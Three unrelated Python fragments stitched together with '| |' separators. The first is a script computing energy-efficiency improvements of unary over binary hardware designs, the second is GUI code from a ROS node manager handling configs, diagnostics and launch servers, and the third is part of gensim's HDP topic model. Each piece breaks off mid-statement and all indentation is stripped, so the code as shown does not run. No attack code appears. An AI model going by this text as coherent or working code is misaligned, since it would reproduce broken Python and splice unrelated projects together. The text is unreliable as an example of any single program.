for i in range(len(throughput_list_bp_spm)):
onchip_energy_eff_list_bp_spm.append(throughput_list_bp_spm[i] / onchip_energy_list_bp_spm[i])
onchip_energy_eff_list_bs_spm.append(throughput_list_bs_spm[i] / onchip_energy_list_bs_spm[i])
onchip_energy_eff_list_u6_wspm.append(throughput_list_u6_wspm[i] / onchip_energy_list_u6_wspm[i])
onchip_energy_eff_list_u7_wspm.append(throughput_list_u7_wspm[i] / onchip_energy_list_u7_wspm[i])
onchip_energy_eff_list_u8_wspm.append(throughput_list_u8_wspm[i] / onchip_energy_list_u8_wspm[i])
onchip_energy_eff_list_ug_wspm.append(throughput_list_ug_wspm[i] / onchip_energy_list_ug_wspm[i])
total_energy_eff_list_bp_spm.append(throughput_list_bp_spm[i] / total_energy_list_bp_spm[i])
total_energy_eff_list_bs_spm.append(throughput_list_bs_spm[i] / total_energy_list_bs_spm[i])
total_energy_eff_list_u6_wspm.append(throughput_list_u6_wspm[i] / total_energy_list_u6_wspm[i])
total_energy_eff_list_u7_wspm.append(throughput_list_u7_wspm[i] / total_energy_list_u7_wspm[i])
total_energy_eff_list_u8_wspm.append(throughput_list_u8_wspm[i] / total_energy_list_u8_wspm[i])
total_energy_eff_list_ug_wspm.append(throughput_list_ug_wspm[i] / total_energy_list_ug_wspm[i])
onchip_energy_eff_bp_r_list_bs_spm = []
onchip_energy_eff_bp_r_list_u6_wspm = []
onchip_energy_eff_bp_r_list_u7_wspm = []
onchip_energy_eff_bp_r_list_u8_wspm = []
onchip_energy_eff_bp_r_list_ug_wspm = []
total_energy_eff_bp_r_list_bs_spm = []
total_energy_eff_bp_r_list_u6_wspm = []
total_energy_eff_bp_r_list_u7_wspm = []
total_energy_eff_bp_r_list_u8_wspm = []
total_energy_eff_bp_r_list_ug_wspm = []
onchip_energy_eff_bs_r_list_u6_wspm = []
onchip_energy_eff_bs_r_list_u7_wspm = []
onchip_energy_eff_bs_r_list_u8_wspm = []
onchip_energy_eff_bs_r_list_ug_wspm = []
total_energy_eff_bs_r_list_u6_wspm = []
total_energy_eff_bs_r_list_u7_wspm = []
total_energy_eff_bs_r_list_u8_wspm = []
total_energy_eff_bs_r_list_ug_wspm = []
onchip_energy_eff_ug_r_list_u6_wspm = []
onchip_energy_eff_ug_r_list_u7_wspm = []
onchip_energy_eff_ug_r_list_u8_wspm = []
total_energy_eff_ug_r_list_u6_wspm = []
total_energy_eff_ug_r_list_u7_wspm = []
total_energy_eff_ug_r_list_u8_wspm = []
for i in range(len(throughput_list_bp_spm)):
onchip_energy_eff_bp_r_list_bs_spm.append(onchip_energy_eff_list_bs_spm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
onchip_energy_eff_bp_r_list_u6_wspm.append(onchip_energy_eff_list_u6_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
onchip_energy_eff_bp_r_list_u7_wspm.append(onchip_energy_eff_list_u7_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
onchip_energy_eff_bp_r_list_u8_wspm.append(onchip_energy_eff_list_u8_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
onchip_energy_eff_bp_r_list_ug_wspm.append(onchip_energy_eff_list_ug_wspm[i] / onchip_energy_eff_list_bp_spm[i] - 1)
total_energy_eff_bp_r_list_bs_spm.append(total_energy_eff_list_bs_spm[i] / total_energy_eff_list_bp_spm[i] - 1)
total_energy_eff_bp_r_list_u6_wspm.append(total_energy_eff_list_u6_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
total_energy_eff_bp_r_list_u7_wspm.append(total_energy_eff_list_u7_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
total_energy_eff_bp_r_list_u8_wspm.append(total_energy_eff_list_u8_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
total_energy_eff_bp_r_list_ug_wspm.append(total_energy_eff_list_ug_wspm[i] / total_energy_eff_list_bp_spm[i] - 1)
onchip_energy_eff_bs_r_list_u6_wspm.append(onchip_energy_eff_list_u6_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
onchip_energy_eff_bs_r_list_u7_wspm.append(onchip_energy_eff_list_u7_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
onchip_energy_eff_bs_r_list_u8_wspm.append(onchip_energy_eff_list_u8_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
onchip_energy_eff_bs_r_list_ug_wspm.append(onchip_energy_eff_list_ug_wspm[i] / onchip_energy_eff_list_bs_spm[i] - 1)
total_energy_eff_bs_r_list_u6_wspm.append(total_energy_eff_list_u6_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
total_energy_eff_bs_r_list_u7_wspm.append(total_energy_eff_list_u7_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
total_energy_eff_bs_r_list_u8_wspm.append(total_energy_eff_list_u8_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
total_energy_eff_bs_r_list_ug_wspm.append(total_energy_eff_list_ug_wspm[i] / total_energy_eff_list_bs_spm[i] - 1)
onchip_energy_eff_ug_r_list_u6_wspm.append(onchip_energy_eff_list_u6_wspm[i] / onchip_energy_eff_list_ug_wspm[i] - 1)
onchip_energy_eff_ug_r_list_u7_wspm.append(onchip_energy_eff_list_u7_wspm[i] / onchip_energy_eff_list_ug_wspm[i] - 1)
onchip_energy_eff_ug_r_list_u8_wspm.append(onchip_energy_eff_list_u8_wspm[i] / onchip_energy_eff_list_ug_wspm[i] - 1)
total_energy_eff_ug_r_list_u6_wspm.append(total_energy_eff_list_u6_wspm[i] / total_energy_eff_list_ug_wspm[i] - 1)
total_energy_eff_ug_r_list_u7_wspm.append(total_energy_eff_list_u7_wspm[i] / total_energy_eff_list_ug_wspm[i] - 1)
total_energy_eff_ug_r_list_u8_wspm.append(total_energy_eff_list_u8_wspm[i] / total_energy_eff_list_ug_wspm[i] - 1)
if print_energy_eff:
print("On-chip energy efficiency improve: ")
onchip_energy_eff_bp_r_list_ux_wspm_min = min(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
onchip_energy_eff_bp_r_list_ux_wspm_mean = mean(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
onchip_energy_eff_bp_r_list_ux_wspm_median = median(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
onchip_energy_eff_bp_r_list_ux_wspm_max = max(onchip_energy_eff_bp_r_list_u6_wspm + onchip_energy_eff_bp_r_list_u7_wspm + onchip_energy_eff_bp_r_list_u8_wspm)
print("binary parallel (baseline):", onchip_energy_eff_list_bp_spm)
print("binary serial :", onchip_energy_eff_bp_r_list_bs_spm)
print("unary 32c :", onchip_energy_eff_bp_r_list_u6_wspm)
print("unary 64c :", onchip_energy_eff_bp_r_list_u7_wspm)
print("unary 128c :", onchip_energy_eff_bp_r_list_u8_wspm)
print("ugemm 256c :", onchip_energy_eff_bp_r_list_ug_wspm)
print("min improve:", onchip_energy_eff_bp_r_list_ux_wspm_min*100, "%")
print("mean improve:", onchip_energy_eff_bp_r_list_ux_wspm_mean*100, "%")
print("median improve:", onchip_energy_eff_bp_r_list_ux_wspm_median*100, "%")
print("max improve:", onchip_energy_eff_bp_r_list_ux_wspm_max*100, "%")
onchip_energy_eff_bs_r_list_ux_wspm_min = min(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
onchip_energy_eff_bs_r_list_ux_wspm_mean = mean(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
onchip_energy_eff_bs_r_list_ux_wspm_median = median(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
onchip_energy_eff_bs_r_list_ux_wspm_max = max(onchip_energy_eff_bs_r_list_u6_wspm + onchip_energy_eff_bs_r_list_u7_wspm + onchip_energy_eff_bs_r_list_u8_wspm)
print("binary serial (baseline) :", onchip_energy_eff_list_bs_spm)
print("unary 32c :", onchip_energy_eff_bs_r_list_u6_wspm)
print("unary 64c :", onchip_energy_eff_bs_r_list_u7_wspm)
print("unary 128c :", onchip_energy_eff_bs_r_list_u8_wspm)
print("ugemm 256c :", onchip_energy_eff_bs_r_list_ug_wspm)
print("min improve:", onchip_energy_eff_bs_r_list_ux_wspm_min*100, "%")
print("mean improve:", onchip_energy_eff_bs_r_list_ux_wspm_mean*100, "%")
print("median improve:", onchip_energy_eff_bs_r_list_ux_wspm_median*100, "%")
print("max improve:", onchip_energy_eff_bs_r_list_ux_wspm_max*100, "%")
onchip_energy_eff_ug_r_list_ux_wspm_min = min(onchip_energy_eff_ug_r_list_u6_wspm + onchip_energy_eff_ug_r_list_u7_wspm + onchip_energy_eff_ug_r_list_u8_wspm)
onchip_energy_eff_ug_r_list_ux_wspm_mean = mean(onchip_energy_eff_ug_r_list_u6_wspm + onchip_energy_eff_ug_r_list_u7_wspm + onchip_energy_eff_ug_r_list_u8_wspm)
onchip_energy_eff_ug_r_list_ux_wspm_median | |
if ld.path in self._start_nodes_after_load_cfg:
self.start_nodes_by_name(self._start_nodes_after_load_cfg[ld.path], ld.path, True)
del self._start_nodes_after_load_cfg[ld.path]
removed_configs = set(self.__configs.keys()) - set(new_configs)
for cfg in removed_configs:
if isinstance(cfg, tuple):
rospy.logwarn("CFG: unsupported config type: %s" % str(cfg))
continue
if cfg.startswith(url):
print ("remove config", url, cfg)
self.remove_cfg_from_model(cfg)
del self.__configs[cfg]
else:
pass
self.updateButtons()
for cfg in new_configs:
if cfg in self._cfg_changed_nodes:
changed_nodes = self._cfg_changed_nodes[cfg]
del self._cfg_changed_nodes[cfg]
node_count = ''
if len(changed_nodes) > 1:
node_count = 's [%d]' % len(changed_nodes)
nodes_text = '<br>'
for chn in changed_nodes:
nodes_text += "%s " % HTMLDelegate.toHTML(chn)
self.message_frame.show_question(MessageFrame.TYPE_NODE_CFG, 'Configuration changed for node%s:%s<br>restart?' % (node_count, nodes_text), MessageData((changed_nodes, cfg)))
def on_nmd_version_retrieved(self, nmd_url, version, date):
if not nmdurl.equal_uri(nmdurl.masteruri(nmd_url), self.masteruri):
return
self._diag_nmd_version = version
self._check_diag_state_nmd()
def on_log_dir_retrieved(self, nmd_url, log_dir_size):
if not nmdurl.equal_uri(nmdurl.masteruri(nmd_url), self.masteruri):
return
self._diag_log_dir_size = log_dir_size
self._check_diag_state_nmd()
def _check_diag_state_nmd(self):
state_ok = True
if self._diag_nmd_version is not None:
if self._diag_nmd_version != self._nmd_version:
state_ok = False
res = self.set_diagnostic_warn('/node_manager_daemon', "node_manager_daemon has on<br>%s different version<br>'%s', own:<br>'%s'.<br>Please update and restart!" % (self.masteruri, self._diag_nmd_version, self._nmd_version))
if not res:
self.message_frame.show_question(MessageFrame.TYPE_NMD, "node_manager_daemon has on %s different version '%s', own '%s'.\nShould it be started?" % (self.masteruri, self._diag_nmd_version, self._nmd_version), MessageData(self.masteruri))
if self._diag_log_dir_size is not None:
if self._diag_log_dir_size > 1073741824:
state_ok = False
hostname = get_hostname(self.masteruri)
clean_cmd = '<a href="rosclean://%s" title="calls `rosclean purge` at `%s`">rosclean purge</a>' % (self.masteruri.replace('http://', ''), hostname)
res = self.set_diagnostic_warn('/node_manager_daemon', "disk usage in log directory @%s is %s. %s" % (get_hostname(self.masteruri), sizeof_fmt(self._diag_log_dir_size), clean_cmd))
if state_ok:
self.set_diagnostic_ok('/node_manager_daemon')
def set_diagnostic_warn(self, node_name, msg):
if DIAGNOSTICS_AVAILABLE:
diagnostic_status = DiagnosticStatus()
diagnostic_status.name = node_name
diagnostic_status.level = DiagnosticStatus.WARN
diagnostic_status.message = msg
self.append_diagnostic(diagnostic_status)
return True
return False
def set_diagnostic_ok(self, node_name):
if DIAGNOSTICS_AVAILABLE:
diagnostic_status = DiagnosticStatus()
diagnostic_status.name = node_name
diagnostic_status.level = DiagnosticStatus.OK
diagnostic_status.message = ''
self.append_diagnostic(diagnostic_status)
return True
return False
def update_system_diagnostics(self, diagnostics):
self.node_tree_model.update_system_diagnostics(self.masteruri, diagnostics)
selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
selectedNodes = self.hostsFromIndexes(selections)
if len(selectedNodes) == 1:
if selectedNodes[0].local:
self.on_node_selection_changed(None, None)
def append_diagnostic(self, diagnostic_status, isnew=True):
result = False
if (diagnostic_status.name == '/master_sync'):
if get_hostname(self.masteruri) != diagnostic_status.hardware_id:
return False
nodes = self.getNode(diagnostic_status.name)
for node in nodes:
node.append_diagnostic_status(diagnostic_status)
result = True
if nodes:
selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
selectedNodes = self.nodesFromIndexes(selections)
if len(selectedNodes) == 1:
node = selectedNodes[0]
if node.name == diagnostic_status.name:
self.on_node_selection_changed(None, None)
elif isnew:
# store to have messages received before node was detected
self._stored_diagnostic_messages[time.time()] = diagnostic_status
return result
def sysmon_active_update(self):
if self._sysmon_timer is None:
self._sysmon_timer = QTimer()
self._sysmon_timer.timeout.connect(self._sysmon_update_callback)
self._sysmon_timer.start(1000)
self.node_tree_model.sysmon_set_state(self.masteruri, True)
else:
self._sysmon_timer.stop()
self._sysmon_timer = None
self.node_tree_model.sysmon_set_state(self.masteruri, False)
# update host description
selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
selectedNodes = self.hostsFromIndexes(selections)
if len(selectedNodes) == 1:
if selectedNodes[0].local:
self.on_node_selection_changed(None, None)
def _sysmon_update_callback(self):
if self._has_nmd and self.__online:
nm.nmd().monitor.get_system_diagnostics_threaded(nmdurl.nmduri(self.masteruri))
if not nm.is_local(self.mastername):
nm.nmd().monitor.get_diagnostics_threaded(nmdurl.nmduri(self.masteruri))
@property
def launch_servers(self):
return self.__launch_servers
def has_launch_server(self):
'''
Returns `True` if the there are roslaunch server, which have no `master` as
node or or have other nodes as `rosout-#` inside.
'''
for _, (_, nodes) in self.__launch_servers.items(): # _:= uri, pid
if not self._is_master_launch_server(nodes):
return True
return False
def _is_master_launch_server(self, nodes):
if 'master' in nodes and len(nodes) < 3:
return True
return False
def on_launch_server_retrieved(self, serveruri, pid, nodes):
'''
Handles the info about roslaunch server.
Emits a Qt signal L{host_description_updated} to notify about a new host
description and a Qt signal L{capabilities_update_signal} to notify about a capabilities
update.
:param str serveruri: the URI of the roslaunch server
:param str pid: the process id of the roslaunch server
:param list(str) nodes: list with nodes handled by the roslaunch server
'''
self.__launch_servers[serveruri] = (pid, nodes)
def on_launch_server_err(self, serveruri, msg):
'''
Handles the error messages from launch server hanlder.
:param str serveruri: the URI of the launch server
:param str msg: the error message
'''
try:
del self.__launch_servers[serveruri]
except Exception:
pass
def on_remove_all_launch_server(self):
'''
Kill all running launch server. The coresponding URIS are removed by master_monitor.
'''
for lsuri, (pid, nodes) in self.__launch_servers.items():
try:
if not self._is_master_launch_server(nodes):
self._progress_queue.add2queue(utf8(uuid.uuid4()),
'kill roslaunch %s (%s)' % (lsuri, utf8(pid)),
nm.starter().kill,
{'host': get_hostname(lsuri),
'pid': pid,
'auto_pw_request': False,
'user': self.current_user
})
self.launch_server_handler.updateLaunchServerInfo(lsuri, delayed_exec=3.0)
except Exception as e:
rospy.logwarn("Error while kill roslaunch %s: %s", utf8(lsuri), utf8(e))
raise DetailedError("Kill error",
''.join(['Error while kill roslaunch ', lsuri]),
utf8(e))
self._start_queue(self._progress_queue)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%% Handling of the view activities %%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def on_node_activated(self, index):
'''
Depending of the state of the node, it will be run or the screen output will
be open.
:param index: The index of the activated node
:type index: :class:`QtCore.QModelIndex` <https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>
'''
self.__last_node_activation = time.time()
selectedNodes = []
if index.column() == 0:
selectedNodes = self.nodesFromIndexes(self.ui.nodeTreeView.selectionModel().selectedIndexes(), False)
if not selectedNodes:
return
has_running = False
has_stopped = False
has_invalid = False
for node in selectedNodes:
if node.uri is not None:
has_running = True
if node.pid is None:
has_invalid = True
else:
has_stopped = True
if has_stopped:
self.on_start_clicked()
elif has_running:
self.on_io_clicked(activated=True)
def on_node_clicked(self, index):
if time.time() - self.__last_node_activation > 1.:
self.message_frame.hide_question([MessageFrame.TYPE_NODELET])
self.info_frame.hide_question([MessageFrame.TYPE_NOSCREEN])
if time.time() - self.__last_selection > 1.:
self.on_node_selection_changed(None, None, True)
def on_topic_activated(self, index):
'''
:param index: The index of the activated topic
:type index: :class:`QtCore.QModelIndex` <https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>
'''
model_index = self.topic_proxyModel.mapToSource(index)
item = self.topic_model.itemFromIndex(model_index)
if isinstance(item, TopicItem):
self.on_topic_echo_clicked([item.topic])
def on_topic_clicked(self, index):
if time.time() - self.__last_selection > 1.:
self.on_topic_selection_changed(None, None, True)
def on_service_activated(self, index):
'''
:param index: The index of the activated service
:type index: :class:`QtCore.QModelIndex` <https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>
'''
model_index = self.service_proxyModel.mapToSource(index)
item = self.service_model.itemFromIndex(model_index)
if isinstance(item, ServiceItem):
self.on_service_call_clicked([item.service])
def on_service_clicked(self, index):
if time.time() - self.__last_selection > 1.:
self.on_service_selection_changed(None, None, True)
def on_host_inserted(self, item):
if item == (self.masteruri, nm.nameres().hostname(get_hostname(self.masteruri))):
index = self.node_tree_model.indexFromItem(item)
model_index = self.node_proxy_model.mapFromSource(index)
if model_index.isValid():
self.ui.nodeTreeView.expand(model_index)
# self.ui.nodeTreeView.expandAll()
def on_node_collapsed(self, index):
if not index.parent().isValid():
self.ui.nodeTreeView.selectionModel().clear()
def on_node_expanded(self, index):
pass
def _create_html_list(self, title, items, list_type=None, name=''):
'''
:param list_type: LAUNCH, TOPIC, NODE, SERVICE
:type list_type: str
'''
result = ''
if items:
result = '<b><u>%s</u></b>' % (title)
if len(items) > 1:
result = '%s <span style="color:gray;">[%d]</span>' % (result, len(items))
result = '%s<table style="display: inline-table">' % result
items.sort()
for i in items:
item = i
# reduce the displayed name
item_name = i
if name:
if item_name.startswith(name):
item_name = item_name.replace('%s%s' % (name, roslib.names.SEP), '~', 1)
ns = roslib.names.namespace(name)
if item_name.startswith(ns) and ns != roslib.names.SEP:
item_name = item_name.replace(ns, '', 1)
if list_type in ['NODE']:
item = '<tr>'
item += '<td><a href="node://%s%s">%s</a><td>' % (self.mastername, i, item_name)
item += '</tr>'
elif list_type in ['TOPIC_PUB', 'TOPIC_SUB']:
# determine the count of publisher or subscriber
count = None
try:
tpc = self.__master_info.getTopic(i)
if list_type == 'TOPIC_SUB':
count = len(tpc.publisherNodes)
if name not in tpc.subscriberNodes:
count = None
else:
count = len(tpc.subscriberNodes)
if name not in tpc.publisherNodes:
count = None
except Exception:
pass
# add the count
if count is not None:
item = '<tr>'
item += '<td><span style="color:gray;">%d</span><td>' % (count)
item += '<td><a href="topicecho://%s%s"><span style="color:gray;"><i>echo</i></span></a><td>' % (self.mastername, i)
item += '<td><a href="topic://%s">%s</a><td>' % (i, item_name)
#sekkyumu_topic_echo_24 = nm.settings().icon_path('sekkyumu_topic_echo_24.png')
#item += '<td><a href="topicecho://%s%s" title="Show the content of the topic"><img src="%s" alt="echo"></a></td>' % (self.mastername, i, sekkyumu_topic_echo_24)
item += '</tr>'
else:
item = '<tr>'
item += '<td colspan="3" style="float:left"><span style="color:red;">!sync </span><a>%s</a><td>' % (item_name)
item += '</tr>'
elif list_type == 'SERVICE':
try:
srv = self.__master_info.getService(i)
if srv is not None and name in srv.serviceProvider:
item = '<tr>'
item += '<td><a href="servicecall://%s%s"><span style="color:gray;"><i>call</i></span></a><td>' % (self.mastername, i)
item += '<td><a href="service://%s%s">%s</a><td>' % (self.mastername, i, item_name)
item += '</tr>'
else:
item = '<tr>'
item += '<td colspan="2" style="float:left"><span style="color:red;">!sync </span>%s<td>' % (item_name)
item += '</tr>'
except Exception:
item = '<tr>'
item += '<td colspan="2" style="float:left"><span style="color:red;">?sync </span>%s<td>' % (item_name)
item += '</tr>'
elif list_type == 'LAUNCH':
if i in self.__configs and self.__configs[i].global_param_done:
item = '<tr>'
item_ref = '<a href="%s">%s</a>' % (i.replace('grpc://', 'open-edit://'), os.path.basename(item_name))
item += '<td>%s<td>' % (item_ref)
pkg, _path = nm.nmd().file.package_name(i)
item += '<td><i>%s</i><td>' % (os.path.dirname(item_name) if pkg is None else pkg)
item += '</tr>'
result += item
result += '</table>\n<br>'
return result
def on_tab_current_changed(self, index):
tab_name = self.ui.tabWidget.currentWidget().objectName()
if tab_name == 'tabTopics':
# select the topics of the selected node in the "Topic" view
selections = self.ui.nodeTreeView.selectionModel().selectedIndexes()
selectedNodes = self.nodesFromIndexes(selections)
if len(selectedNodes) == 1:
node = selectedNodes[0]
selected_topics = self.topic_model.index_from_names(node.published, node.subscribed)
for s in selected_topics:
self.ui.topicsView.selectionModel().select(self.topic_proxyModel.mapFromSource(s), QItemSelectionModel.Select)
elif tab_name == 'tabServices':
# select the services of the selected node in the "Services" view
selections = | |
chunk:
if len(doc) > 0:
doc_word_ids, doc_word_counts = zip(*doc)
doc_score = self.doc_e_step(
ss, Elogsticks_1st,
unique_words, doc_word_ids,
doc_word_counts, self.m_var_converge
)
count += sum(doc_word_counts)
score += doc_score
if update:
self.update_lambda(ss, word_list, opt_o)
return score, count
def doc_e_step(self, ss, Elogsticks_1st, unique_words, doc_word_ids, doc_word_counts, var_converge):
"""Performs E step for a single doc.
Parameters
----------
ss : :class:`~gensim.models.hdpmodel.SuffStats`
Stats for all document(s) in the chunk.
Elogsticks_1st : numpy.ndarray
Computed Elogsticks value by stick-breaking process.
unique_words : dict of (int, int)
Number of unique words in the chunk.
doc_word_ids : iterable of int
Word ids of for a single document.
doc_word_counts : iterable of int
Word counts of all words in a single document.
var_converge : float
Lower bound on the right side of convergence. Used when updating variational parameters for a single
document.
Returns
-------
float
Computed value of likelihood for a single document.
"""
chunkids = [unique_words[id] for id in doc_word_ids]
Elogbeta_doc = self.m_Elogbeta[:, doc_word_ids]
# very similar to the hdp equations
v = np.zeros((2, self.m_K - 1))
v[0] = 1.0
v[1] = self.m_alpha
# back to the uniform
phi = np.ones((len(doc_word_ids), self.m_K)) * 1.0 / self.m_K
likelihood = 0.0
old_likelihood = -1e200
converge = 1.0
iter = 0
max_iter = 100
# not yet support second level optimization yet, to be done in the future
while iter < max_iter and (converge < 0.0 or converge > var_converge):
# update variational parameters
# var_phi
if iter < 3:
var_phi = np.dot(phi.T, (Elogbeta_doc * doc_word_counts).T)
(log_var_phi, log_norm) = matutils.ret_log_normalize_vec(var_phi)
var_phi = np.exp(log_var_phi)
else:
var_phi = np.dot(phi.T, (Elogbeta_doc * doc_word_counts).T) + Elogsticks_1st
(log_var_phi, log_norm) = matutils.ret_log_normalize_vec(var_phi)
var_phi = np.exp(log_var_phi)
# phi
if iter < 3:
phi = np.dot(var_phi, Elogbeta_doc).T
(log_phi, log_norm) = matutils.ret_log_normalize_vec(phi)
phi = np.exp(log_phi)
else:
phi = np.dot(var_phi, Elogbeta_doc).T + Elogsticks_2nd # noqa:F821
(log_phi, log_norm) = matutils.ret_log_normalize_vec(phi)
phi = np.exp(log_phi)
# v
phi_all = phi * np.array(doc_word_counts)[:, np.newaxis]
v[0] = 1.0 + np.sum(phi_all[:, :self.m_K - 1], 0)
phi_cum = np.flipud(np.sum(phi_all[:, 1:], 0))
v[1] = self.m_alpha + np.flipud(np.cumsum(phi_cum))
Elogsticks_2nd = expect_log_sticks(v)
likelihood = 0.0
# compute likelihood
# var_phi part/ C in john's notation
likelihood += np.sum((Elogsticks_1st - log_var_phi) * var_phi)
# v part/ v in john's notation, john's beta is alpha here
log_alpha = np.log(self.m_alpha)
likelihood += (self.m_K - 1) * log_alpha
dig_sum = psi(np.sum(v, 0))
likelihood += np.sum((np.array([1.0, self.m_alpha])[:, np.newaxis] - v) * (psi(v) - dig_sum))
likelihood -= np.sum(gammaln(np.sum(v, 0))) - np.sum(gammaln(v))
# Z part
likelihood += np.sum((Elogsticks_2nd - log_phi) * phi)
# X part, the data part
likelihood += np.sum(phi.T * np.dot(var_phi, Elogbeta_doc * doc_word_counts))
converge = (likelihood - old_likelihood) / abs(old_likelihood)
old_likelihood = likelihood
if converge < -0.000001:
logger.warning('likelihood is decreasing!')
iter += 1
# update the suff_stat ss
# this time it only contains information from one doc
ss.m_var_sticks_ss += np.sum(var_phi, 0)
ss.m_var_beta_ss[:, chunkids] += np.dot(var_phi.T, phi.T * doc_word_counts)
return likelihood
def update_lambda(self, sstats, word_list, opt_o):
"""Update appropriate columns of lambda and top level sticks based on documents.
Parameters
----------
sstats : :class:`~gensim.models.hdpmodel.SuffStats`
Statistic for all document(s) in the chunk.
word_list : list of int
Contains word id of all the unique words in the chunk of documents on which update is being performed.
opt_o : bool, optional
If True - invokes a call to :meth:`~gensim.models.hdpmodel.HdpModel.optimal_ordering` to order the topics.
"""
self.m_status_up_to_date = False
# rhot will be between 0 and 1, and says how much to weight
# the information we got from this mini-chunk.
rhot = self.m_scale * pow(self.m_tau + self.m_updatect, -self.m_kappa)
if rhot < rhot_bound:
rhot = rhot_bound
self.m_rhot = rhot
# Update appropriate columns of lambda based on documents.
self.m_lambda[:, word_list] = \
self.m_lambda[:, word_list] * (1 - rhot) + rhot * self.m_D * sstats.m_var_beta_ss / sstats.m_chunksize
self.m_lambda_sum = (1 - rhot) * self.m_lambda_sum + \
rhot * self.m_D * np.sum(sstats.m_var_beta_ss, axis=1) / sstats.m_chunksize
self.m_updatect += 1
self.m_timestamp[word_list] = self.m_updatect
self.m_r.append(self.m_r[-1] + np.log(1 - rhot))
self.m_varphi_ss = \
(1.0 - rhot) * self.m_varphi_ss + rhot * sstats.m_var_sticks_ss * self.m_D / sstats.m_chunksize
if opt_o:
self.optimal_ordering()
# update top level sticks
self.m_var_sticks[0] = self.m_varphi_ss[:self.m_T - 1] + 1.0
var_phi_sum = np.flipud(self.m_varphi_ss[1:])
self.m_var_sticks[1] = np.flipud(np.cumsum(var_phi_sum)) + self.m_gamma
def optimal_ordering(self):
"""Performs ordering on the topics."""
idx = matutils.argsort(self.m_lambda_sum, reverse=True)
self.m_varphi_ss = self.m_varphi_ss[idx]
self.m_lambda = self.m_lambda[idx, :]
self.m_lambda_sum = self.m_lambda_sum[idx]
self.m_Elogbeta = self.m_Elogbeta[idx, :]
def update_expectations(self):
"""Since we're doing lazy updates on lambda, at any given moment the current state of lambda may not be
accurate. This function updates all of the elements of lambda and Elogbeta so that if (for example) we want to
print out the topics we've learned we'll get the correct behavior.
"""
for w in range(self.m_W):
self.m_lambda[:, w] *= np.exp(self.m_r[-1] - self.m_r[self.m_timestamp[w]])
self.m_Elogbeta = \
psi(self.m_eta + self.m_lambda) - psi(self.m_W * self.m_eta + self.m_lambda_sum[:, np.newaxis])
self.m_timestamp[:] = self.m_updatect
self.m_status_up_to_date = True
def show_topic(self, topic_id, topn=20, log=False, formatted=False, num_words=None):
"""Print the `num_words` most probable words for topic `topic_id`.
Parameters
----------
topic_id : int
Acts as a representative index for a particular topic.
topn : int, optional
Number of most probable words to show from given `topic_id`.
log : bool, optional
If True - logs a message with level INFO on the logger object.
formatted : bool, optional
If True - get the topics as a list of strings, otherwise - get the topics as lists of (weight, word) pairs.
num_words : int, optional
DEPRECATED, USE `topn` INSTEAD.
Warnings
--------
The parameter `num_words` is deprecated, will be removed in 4.0.0, please use `topn` instead.
Returns
-------
list of (str, numpy.float) **or** list of str
Topic terms output displayed whose format depends on `formatted` parameter.
"""
if num_words is not None: # deprecated num_words is used
warnings.warn(
"The parameter `num_words` is deprecated, will be removed in 4.0.0, please use `topn` instead."
)
topn = num_words
if not self.m_status_up_to_date:
self.update_expectations()
betas = self.m_lambda + self.m_eta
hdp_formatter = HdpTopicFormatter(self.id2word, betas)
return hdp_formatter.show_topic(topic_id, topn, log, formatted)
def get_topics(self):
"""Get the term topic matrix learned during inference.
Returns
-------
np.ndarray
`num_topics` x `vocabulary_size` array of floats
"""
topics = self.m_lambda + self.m_eta
return topics / topics.sum(axis=1)[:, None]
def show_topics(self, num_topics=20, num_words=20, log=False, formatted=True):
"""Print the `num_words` most probable words for `num_topics` number of topics.
Parameters
----------
num_topics : int, optional
Number of topics for which most probable `num_words` words will be fetched, if -1 - print all topics.
num_words : int, optional
Number of most probable words to show from `num_topics` number of topics.
log : bool, optional
If True - log a message with level INFO on the logger object.
formatted : bool, optional
If True - get the topics as a list of strings, otherwise - get the topics as lists of (weight, word) pairs.
Returns
-------
list of (str, numpy.float) **or** list of str
Output format for topic terms depends on the value of `formatted` parameter.
"""
if not self.m_status_up_to_date:
self.update_expectations()
betas = self.m_lambda + self.m_eta
hdp_formatter = HdpTopicFormatter(self.id2word, betas)
return hdp_formatter.show_topics(num_topics, num_words, log, formatted)
@deprecated("This method will be removed in 4.0.0, use `save` instead.")
def save_topics(self, doc_count=None):
"""Save discovered topics.
Warnings
--------
This method is deprecated, use :meth:`~gensim.models.hdpmodel.HdpModel.save` instead.
Parameters
----------
doc_count : int, optional
